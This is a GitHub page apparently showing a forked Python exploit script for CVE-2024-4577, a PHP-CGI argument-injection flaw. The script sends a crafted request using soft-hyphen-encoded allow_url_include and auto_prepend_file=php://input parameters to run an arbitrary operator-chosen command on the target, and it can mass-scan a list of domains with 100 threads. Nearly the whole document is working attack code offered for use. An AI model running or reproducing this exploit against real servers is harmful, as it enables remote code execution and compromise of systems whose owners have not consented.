forked from gotr00t0day/CVE-2024-4577
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2024-4577.py
72 lines (54 loc) · 2.06 KB
/
CVE-2024-4577.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
from colorama import Fore
from concurrent.futures import ThreadPoolExecutor
import requests
import argparse
import socket
# Author: c0d3ninja
# Youtube: gotr00t0day
# Instagram: gotr00t0day
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36"
parser = argparse.ArgumentParser()
parser.add_argument('-t', '--target',
help="target to scan")
parser.add_argument('-c', '--command',
help="command to execute")
parser.add_argument('-f', '--file',
help="domains.txt")
args = parser.parse_args()
header = {
"User-Agent": user_agent
}
def vuln_check(domain_command: tuple) -> None:
domain, command = domain_command
try:
s = requests.Session()
if "https://" not in domain:
domain = f"https://{domain}"
else:
pass
r = s.post(f"{domain}/index.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input", verify=False, data=f"{command};echo gotr00t; die;", headers=header, timeout=10)
if "gotr00t" in r.text:
print(f"{Fore.GREEN}[+]{Fore.WHITE}{domain}")
else:
print(f"{Fore.RED}[-] {Fore.WHITE}{domain}")
except socket.gaierror:
pass
except requests.exceptions.ConnectionError:
pass
except requests.exceptions.ReadTimeout:
pass
def scan_domains(file: str, command: str) -> None:
with open(file, "r") as f:
domains = [x.strip() for x in f.readlines()]
with ThreadPoolExecutor(max_workers=100) as executor:
executor.map(vuln_check, [(domain, command) for domain in domains])
if __name__ == "__main__":
if args.target:
if args.command:
vuln_check((args.target, args.command))
if args.file:
if args.command:
scan_domains(args.file, args.command)
else:
print("Please provide a command to execute with the -c/--command option.")